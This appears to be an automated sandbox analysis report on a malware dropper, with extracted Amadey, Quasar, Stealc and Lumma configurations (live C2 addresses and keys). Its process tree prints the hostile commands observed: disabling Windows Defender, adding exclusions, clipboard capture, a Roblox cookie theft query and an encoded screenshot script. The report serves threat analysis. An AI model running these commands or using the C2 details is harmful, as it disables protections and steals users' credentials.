Resubmissions

09-12-2024 04:29

241209-e3748szkfx 10

08-12-2024 21:08

241208-zy4w8syqbq 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 21:08

General

  • Target

    file.exe

  • Size

    3.2MB

  • MD5

    8310dd77fc508989327b7242d9f00757

  • SHA1

    0f47666d19e93f838bf9e2d67a1a0c42dd2561f2

  • SHA256

    306e3f1775f8481fe89d3575b57d8bcab355e9d55d1b66cbf7b246f8bd2a3dd0

  • SHA512

    279770c1ae7698765dca0a7d4cffb6695381f8513ac12283c6e77b80cfd198d2a16c1ed12854f17ca8f91089632bbae65278bf8d157ec01fc3538cdc4416e697

  • SSDEEP

    49152:eKsUSrfMdl+qB2OAS4aNPTET48NqCnf9lZOUdcczoJ:eTUqMdQshAS4aNP58NqClPdw

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

45.200.148.155:6060

Mutex

4b3820e0-d123-49d9-b51e-3c4daa4f6874

Attributes
  • encryption_key

    F8879E9B26846C57C99B6F152F74703E1CC15B8B

  • install_name

    SecurityHealthSystray.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SecurityHealthSystray.exe

  • subdirectory

    SubDir

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
        "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1372
        • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
          "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exe -pbeznogym
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4256
            • C:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exe
              C:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exe -pbeznogym
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:220
              • C:\ProgramData\Microsoft\hacn.exe
                "C:\ProgramData\Microsoft\hacn.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4412
                • C:\ProgramData\Microsoft\hacn.exe
                  "C:\ProgramData\Microsoft\hacn.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:4676
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exe -pbeznogym
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2856
                    • C:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exe
                      C:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exe -pbeznogym
                      10⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:3820
                      • C:\ProgramData\Microsoft\hacn.exe
                        "C:\ProgramData\Microsoft\hacn.exe"
                        11⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3472
                      • C:\ProgramData\Microsoft\based.exe
                        "C:\ProgramData\Microsoft\based.exe"
                        11⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4636
                        • C:\ProgramData\Microsoft\based.exe
                          "C:\ProgramData\Microsoft\based.exe"
                          12⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3336
              • C:\ProgramData\Microsoft\based.exe
                "C:\ProgramData\Microsoft\based.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\ProgramData\Microsoft\based.exe
                  "C:\ProgramData\Microsoft\based.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:100
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                    9⤵
                      PID:3804
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2940
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      9⤵
                        PID:856
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                          10⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1392
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'"
                        9⤵
                          PID:1808
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'
                            10⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3472
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1544
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            10⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5116
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:916
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            10⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2288
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                          9⤵
                            PID:3208
                            • C:\Windows\System32\Wbem\WMIC.exe
                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                              10⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4684
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                            9⤵
                            • Clipboard Data
                            PID:4440
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-Clipboard
                              10⤵
                              • Clipboard Data
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3584
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            9⤵
                              PID:1456
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                10⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2156
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              9⤵
                                PID:4260
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  10⤵
                                    PID:2400
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "systeminfo"
                                  9⤵
                                    PID:4932
                                    • C:\Windows\system32\systeminfo.exe
                                      systeminfo
                                      10⤵
                                      • Gathers system information
                                      PID:5248
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                    9⤵
                                      PID:3964
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        10⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5188
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqj1jdql\lqj1jdql.cmdline"
                                          11⤵
                                            PID:6116
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90D1.tmp" "c:\Users\Admin\AppData\Local\Temp\lqj1jdql\CSC6FADDFF0AEED418089CC6DAD51E828E.TMP"
                                              12⤵
                                                PID:1236
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          9⤵
                                            PID:5132
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              10⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5600
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            9⤵
                                              PID:5316
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                10⤵
                                                  PID:6056
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                9⤵
                                                  PID:4820
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    10⤵
                                                      PID:4040
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    9⤵
                                                      PID:4364
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        10⤵
                                                          PID:5384
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        9⤵
                                                          PID:5396
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            10⤵
                                                              PID:5560
                                                          • C:\Windows\system32\cmd.exe
